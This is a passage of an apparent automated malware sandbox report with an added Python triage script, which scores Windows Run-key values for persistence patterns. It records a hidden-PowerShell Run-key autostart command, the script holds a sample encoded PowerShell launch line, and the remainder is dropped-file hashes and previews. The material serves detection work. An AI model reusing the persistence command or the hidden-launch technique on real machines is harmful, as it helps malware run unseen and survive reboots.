08:43:29  Autostart: Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
08:43:37  Autostart: Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
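The two Autostart rows above are the persistence the report's signatures describe: a Run value with a "$rbx-" name whose data pipes an echoed Start-Process line into a hidden powershell.exe, so the script text never exists as a .ps1 on disk, and the target batch file sits in a "$"-named directory directly under C:\Windows. The following is an added example, not part of the Joe Sandbox report or of the sample: a triage pass over exported Run-key values that scores each one against those three ideas plus the usual encoded-command check. The entries in SAMPLE_RUN_VALUES are constructed for the example; only the first is the value recorded in the report. The heuristics and thresholds are this example's own.

```python
"""Score Run-key values for the patterns this report records (added example, not report code)."""
import re
from dataclasses import dataclass, field

# Constructed (value name, value data) pairs as exported from a Run key.
# Entry 0 is the report's own $rbx-XVR value; the other three are invented
# to show one benign entry, one encoded-command entry and one system entry.
SAMPLE_RUN_VALUES = [
    ("$rbx-XVR",
     r"cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' "
     r"-WindowStyle Hidden | powershell.exe -WindowStyle Hidden"),
    ("OneDrive",
     r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("Updater",
     r"powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    ("SecurityHealth",
     r"%windir%\system32\SecurityHealthSystray.exe"),
]

_RE_POWERSHELL = re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I)
# "echo <script> | powershell": the script body is only ever on the pipe
_RE_ECHO_PIPE = re.compile(r"\becho\b.*\|\s*powershell", re.I)
_RE_HIDDEN = re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I)
_RE_ENCODED = re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)
# A file directly under C:\Windows that is not in System32/SysWOW64; user-writable
# drops there are the "binary in C:\Windows" the report's signature refers to.
_RE_WINDOWS_DROP = re.compile(
    r"(?<![\w%])c:\\windows\\(?!system32\\|syswow64\\)[^\s'\"]+", re.I)
_RE_DOLLAR_PATH = re.compile(r"\\\$[^\\\s'\"]+")


@dataclass
class Finding:
    name: str
    data: str
    reasons: list = field(default_factory=list)

    @property
    def score(self) -> int:
        return len(self.reasons)


def assess_run_value(name: str, data: str) -> Finding:
    """One reason per matched heuristic; the score is the number of reasons."""
    f = Finding(name, data)
    if _RE_ECHO_PIPE.search(data):
        f.reasons.append("cmd echo piped into powershell (script never stored as .ps1)")
    elif _RE_POWERSHELL.search(data):
        f.reasons.append("launches powershell from a Run key")
    if _RE_HIDDEN.search(data):
        f.reasons.append("requests a hidden window")
    if _RE_ENCODED.search(data):
        f.reasons.append("base64-encoded command")
    m = _RE_WINDOWS_DROP.search(data)
    if m:
        f.reasons.append(f"points into C:\\Windows outside the system directories: {m.group(0)}")
    if name.startswith("$") or _RE_DOLLAR_PATH.search(data):
        f.reasons.append("'$'-prefixed value name or path component (this sample's $rbx- naming)")
    return f


def triage(values=SAMPLE_RUN_VALUES, min_score=2):
    """Findings at or above min_score, highest score first."""
    findings = (assess_run_value(n, d) for n, d in values)
    return sorted((f for f in findings if f.score >= min_score),
                  key=lambda f: f.score, reverse=True)


if __name__ == "__main__":
    for f in triage():
        print(f"[{f.score}] {f.name}: {f.data}")
        for r in f.reasons:
            print("     -", r)
```

On a live host the same scoring can be fed from `Get-ItemProperty` over HKCU and HKLM Run/RunOnce; the report shows the key written under both HKCU and the HKCU64 view, so a 32-bit collector that only reads one view will miss half the picture.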
                            No context

Process: C:\Windows\System32\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 1.508739593746198
Encrypted: false
SSDEEP: 192:7w2ylmGvy9d0eLDkjaVTyJN5Wl4lg6zuiFGZ24lO8n:TygGvykeLDkj+T+5gqg6zuiFGY4lO8n
MD5: 37B792005EDF19E81B1ABF66F4816740
SHA1: 25CE8BA8EC3598029550DF1167F687BA149224E9
SHA-256: 49E129B1A9E5646E7F885D389A8DE9904AEB4E52AF89A5E08C72CB88D346737A
SHA-512: 7B2F533BA9D60EE4ADB1B6E81F0C0825BEE43257CE2B344651D24929D7BE3D6C9874D52065B8595C9A0FBDCEB941D6B41A0B2EFCF63E4D052415AB82FFAE2B7B
Malicious: false
                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.5.0.1.3.2.8.8.0.8.4.7.5.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.5.0.1.3.3.0.0.4.2.8.4.4.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.f.8.0.d.8.d.a.-.3.1.d.f.-.4.b.2.c.-.b.c.f.b.-.3.1.8.3.0.9.2.5.e.2.b.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.a.a.c.a.5.e.8.-.4.3.c.0.-.4.a.7.3.-.a.d.a.4.-.e.6.c.d.0.8.5.7.d.2.9.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.p.o.w.e.r.s.h.e.l.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.0.4.-.0.0.0.1.-.0.0.1.4.-.a.0.9.8.-.d.5.e.6.3.0.1.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.

Process: C:\Windows\System32\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 1.5087593177022136
Encrypted: false
SSDEEP: 192:VkbkmGpy9d0eLDkja1TyGcDulAlg6zuiFGZ24lO8n:mjGpykeLDkjOTQD4Cg6zuiFGY4lO8n
MD5: FAC113DBE19E9E416829F0587F94C759
SHA1: 31F9BCF76E16F2E3B6BF8BDE349FC80747F8C834
SHA-256: D8A5F4773BAD869F44A72EEC61DD3366B0EF6FE88220DD8F09840002DD1BAF6C
SHA-512: 7105DB3A8A2FAB3103B45DC940E8AD42B7E056DC59057AC7701E011DF7FC33183A6C9234F77F2A3DB86E3A6E90989A83684AC91AF86DCD547966DE1F956B93E6
Malicious: false
                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.5.0.1.3.8.3.3.4.2.8.6.4.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.5.0.1.3.8.4.5.1.4.7.3.7.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.a.7.5.0.e.7.d.-.2.e.6.2.-.4.7.0.3.-.8.6.c.1.-.e.8.7.7.1.a.d.7.f.a.d.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.f.9.d.9.e.1.f.-.8.5.6.9.-.4.a.e.6.-.9.3.d.f.-.a.5.7.0.6.f.b.9.0.2.1.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.p.o.w.e.r.s.h.e.l.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.d.c.-.0.0.0.1.-.0.0.1.4.-.d.f.1.4.-.6.1.0.7.3.1.1.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.

Process: C:\Windows\System32\WerFault.exe
File Type: Mini DuMP crash report, 15 streams, Fri Oct 4 07:43:03 2024, 0x1205a4 type
Category: dropped
Size (bytes): 910700
Entropy (8bit): 3.5216072049855582
Encrypted: false
SSDEEP: 12288:ZcS70pwchF98ojZaontt1gObqO/Q+5Ax:iS70Ki8iZaot/7q4QU
MD5: 0186EDC09DE9EC5B51F90584832B1AFD
SHA1: 0826BD65936D35E8DC1FB60C15B9F1424D2FF096
SHA-256: 9D41FB17AF3AB8C3638D7F3984A7E00D7AA1BCB026D532059AB1B973DF394967
SHA-512: FAA26588EC77E295124925D36AEC108CEA3A436C9D2665D0776F6F7C8E2D9154CB851ADEE13AFFF6CBACF365458ED15D4369951A70A28B6270A9DDE0A41D3E44
Malicious: false
                            Preview:MDMP..a..... ..........f............$............'..8........;...2......................`.......8...........T............_..\............m...........o..............................................................................eJ......|p......Lw......................T..............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Windows\System32\WerFault.exe
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 8782
Entropy (8bit): 3.6959762702757173
Encrypted: false
SSDEEP: 192:R6l7wVeJWMfY6YeRY6gmfZaP4pWEE89bfS8sfMVm:R6lXJVw6YYFgmfQPwfofz
MD5: 429C3655DB86FC5D632BCA554BD68B74
SHA1: 3DCB1437F73F7EB3758D2A5671A3C0A89EA23769
SHA-256: 87A0C3E6C8C1708DED1F242FCF73E74ACD6A8FE515738B2EAC82DCA6F2E89986
SHA-512: 35DAC13B861884E674C4564F014E3392248A9511E3FD3CE380AEE2FF5B5BCB2AE1BC15037616B048FDDCC14B784AA22D3B64D2DFDFD50772545E99E762BEF6DD
Malicious: false
                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.8.2.8.<./.P.i.

Process: C:\Windows\System32\WerFault.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4777
Entropy (8bit): 4.436875741874379
Encrypted: false
SSDEEP: 48:cvIwWl8zsSJg771I9fFyWpW8VYT0Ym8M4JQ9wSFRyq8vlw1ytfhd:uIjfgI7EF7VKBJQGSWu1ufhd
MD5: 2E7AF1C2D5455D8BD63955ADCD51D1CA
SHA1: 8E81343878DEF226DC1277F09E2F42D745B56CB4
SHA-256: 02C13AE00132915770DF9ABB6EC83AE10C4227FA42AFA44636E92FEB76CEAE3C
SHA-512: 9B4955C2C8DEB052381A230C2A5E694E7739EEFD910FEAD0BD45B1815C56E260A34017C444679CF7B096AEA750A1F93B89ABA2B4BF4CF8610629A2957D307BAE
Malicious: false
                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="528405" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:Mini DuMP crash report, 15 streams, Fri Oct 4 07:42:09 2024, 0x1205a4 type
                            Category:dropped
                            Size (bytes):929658
                            Entropy (8bit):3.461112606558634
                            Encrypted:false
                            SSDEEP:6144:JvM4JE70/iM52zie+wdfd3lD6P3cwI/Lq8jEKr3QGnpK0K:eM52zie+o3NA3Bcq8jEKrQGnp
                            MD5:01906B17B4E0673452E66F364167027B
                            SHA1:59C6FE188D94AA7562042052151AD5A0A039794F
                            SHA-256:8694B873A8C186696BAD061EDB951963A4E95FEA77A0EBC2FB0E9B99BB66B9D1
                            SHA-512:462923DB93CAE2F913C6BAF3B3185BADC93FA7CD4A192160B6B71FC962B205ECFFF80A2D0300DD6CEE0B385A8F532B7B07B9B17EC104248813081C00B873074F
                            Malicious:false
                            Preview:MDMP..a..... .......Q..f............T............'..h....... ;...3......T...............`.......8...........T...........`_..............4n.......... p..............................................................................eJ.......p......Lw......................T...........J..f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):8582
                            Entropy (8bit):3.693509751945523
                            Encrypted:false
                            SSDEEP:192:R6l7wVeJf1L3O6YHD61gmfZaP4pWEM89bb1Psfpzpm:R6lXJtrO6Yj61gmfQPYbmfa
                            MD5:2D0362889AB324F37447CE118E10AA1F
                            SHA1:22404E67C9777467F4DF17B789448563D1366C5F
                            SHA-256:6BCED54C544A05B0A5A033EECFD1CCC4E1D42122FEEF9C6EA48C15AACC8A1A81
                            SHA-512:5C71E3757CFC1F8C59E0CDE020E18BBDD7EB3A8625B82E8EB31BA5B7E822CC9DEC83F673BCC23825790CCFD1401B8E36E2EB9E2CBAA8ABBF6031824B68EE946E
                            Malicious:false
                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.2.8.4.<./.P.i.
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):4777
                            Entropy (8bit):4.433221160182472
                            Encrypted:false
                            SSDEEP:48:cvIwWl8zsLtJg771I9fFyWpW8VYJ5Ym8M4JQ9wSFKLoyq8vlwOytfjd:uIjfLHI7EF7V6oJQGJMWuOufjd
                            MD5:DFBAB05D482F5526D54EE52B5FB16057
                            SHA1:E266952E1D8D6B1FAB0AD130B062969B5A1BDBCA
                            SHA-256:248DE062EA64BD2AC8F0E6B81CCC293F4D885BFF18567FEBD1A001DD10FDA1DB
                            SHA-512:6371C8494E79DE08F2333EF333C8D63FF22CC1CBFDEC986E5445655203CE2791AA2DE51AFCBF848E49C008B6E9ACE114DC399FE56A67FDCD395674B4CC3A57E9
                            Malicious:false
                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="528404" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):9713
                            Entropy (8bit):4.940954773740904
                            Encrypted:false
                            SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smu9:9rib4ZIkjh4iUxsNYW6Ypib47
                            MD5:BA7C69EBE30EC7DA697D2772E36A746D
                            SHA1:DA93AC7ADC6DE8CFFED4178E1F98F0D0590EA359
                            SHA-256:CFCE399DF5BE3266219AA12FB6890C6EEFDA46D6279A0DD90E82A970149C5639
                            SHA-512:E0AFE4DF389A060EFDACF5E78BA6419CECDFC674AA5F201C458D517C20CB50B70CD8A4EB23B18C0645BDC7E9F326CCC668E8BADE803DED41FCDA2AE1650B31E8
                            Malicious:false
                            Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):2916
                            Entropy (8bit):5.370813493058233
                            Encrypted:false
                            SSDEEP:48:4SaAzsSU4Yymdax4RIoUP7m9qr9t5/78NfpHcRDGx3axIZVEouNHJBVrH/jCB:taAzlHYv+IfB9qrh7KfpRjPEo2dL8
                            MD5:D689C25F0EDEEC305A2F2409A351E182
                            SHA1:BD5874971D56F1ED49E405FF4FAFD25F323BD41A
                            SHA-256:29A8A13B5957E5011C76C9CF249DBB7B8110C1761401021B29D135B11232D097
                            SHA-512:5FA6A8C21ED92F810CFCBC56A5741C25D7209EFC1E84BB3F8A4600D2F3BAB4FF45DCBAE8677D1943B7F2C8DC94A431890ACC6F5CF2F50911E36D80926BB21A34
                            Malicious:false
                            Preview:@...e...........................................................H..............@-....f.J.|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.................0..~.J.R...L........System.Data.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:DOS executable (COM, 0x8C-variant)
                            Category:modified
                            Size (bytes):352
                            Entropy (8bit):7.415109904127954
                            Encrypted:false
                            SSDEEP:6:iAxVJnCsMCy4a66fS8D7EeYuzRZB4fUHs1+gG7iMn4R4jGmSpvh7cV+U:/c5CyFdPHPzF4fUHsAgGGMn4R4jTgJ1U
                            MD5:FE5F105C5FE691A4724079A34C3FD002
                            SHA1:607724412F46E8221F65C2869DF87E7CAA5D288A
                            SHA-256:A6848E3050D90F07544F46CAE503C87A3A3D73E18858D2A60D7D1BF977955096
                            SHA-512:12C60C98B656524FFD488839E5B3A8B594E553C95E0DC796782CAEEB8D86C0A8C75F9385B735DE22C8D78E2E38F0CC1BBDBB4D72AA83833A9641A51D6EAD032C
                            Malicious:false
                            Preview:.<....].q...w..6I+N..j......J.A}.. -..|.J.........M..~bS%.&..E;I.Uf._G..:........\*.T...._..aOl..^..Y8|...g..&.-....Ys.....B.AI6......Sq..Qlp.#&...o...p...p*.."...x.j.1C.P.0....4....+ea'..US[............a.....T.f.U_0...>...H...I.{7G..^..?.6.3.9i9....X...5...4..u...E.v:.....wb.7......qXj.nu.e),....t!,0..Q..."..+Mq|p.....W6...+.C...pl...m.V
